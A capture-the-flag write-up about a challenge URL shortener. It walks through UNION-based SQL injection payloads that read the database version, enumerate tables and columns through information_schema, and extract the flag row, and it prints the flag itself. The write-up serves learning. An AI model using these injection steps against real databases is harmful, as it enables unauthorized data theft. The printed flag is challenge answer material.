Newemailfromourcontact.png

According to the description http://sci.nuitduhack.com was a url shortening service.

After searching about how these services work i found two “common” practises.

The first was inserting urls in the database and then transforming the ID of that record to Base36 (letters a-z digits 0-9) or some other custom encryption and using it as an alias. But since the alias in the link given had both uppercase, lowercase characters and digits the transformation must be Base62 or it was using some other way to map aliases to urls. Base62 didn’t give us any results so we moved towards the second way of mapping.

That was entering the alias and url in separate fields in the database. So the alias was taking part in an sql query that could be prone to SQL Injection and thus our way in.

Testing this idea with

http://sci.nuitduhack.com/’ UNION SELECT @@version-- a%%%

gave us the first result. The version of the database was returned in the url so alias was passed unfiltered.

Now we just had to find the table and column names.

Some queries to information_schema did the trick:

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 0,1-- a

returns shortner id

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1,1-- a

returns shortner alias

http://sci.nuitduhack.com/' UNION SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 2,1-- a

returns shortner url

Next was to find out how many ids are in the table.
Asking the polite database

http://sci.nuitduhack.com/' UNION SELECT CONCAT(min(id),' ',max(id),' ',count(*)) from shortner-- a

answered with 33 43 11 so there are 11 records in the database starting with id 33 up to 43.
So no need for a bruteforcer to get all records.

The precious flag was in id 40

http://sci.nuitduhack.com/' UNION SELECT CONCAT(url,' ',alias) FROM shortner WHERE id=40-- a


http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt 5867hjgjhgffdedeseddf7967

b92b5e7094c7ffb35a526c9eaa6fab0a



Bonus url :

http://sci.nuitduhack.com/f69148e2 Google

http://sci.nuitduhack.com/7e3aacb2 http://www.hackerzvoice.com

http://sci.nuitduhack.com/1596a271 http://www.bonjourmadame.fr

http://sci.nuitduhack.com/9d0e9373 http://www.bonjourvoisine.fr

http://sci.nuitduhack.com/83df9275 http://www.lkcd.net :?

http://sci.nuitduhack.com/732c1d61 https://www.google.fr/search?q=the+answer+to+life+the+universe+and+everything

http://sci.nuitduhack.com/342d1fff CTF Ranking

http://sci.nuitduhack.com/zomgwtf Rickrolling ;-)

http://sci.nuitduhack.com/trololololololololololololo http://trololololololololololo.com/

http://sci.nuitduhack.com/admin-backend-full WTF !?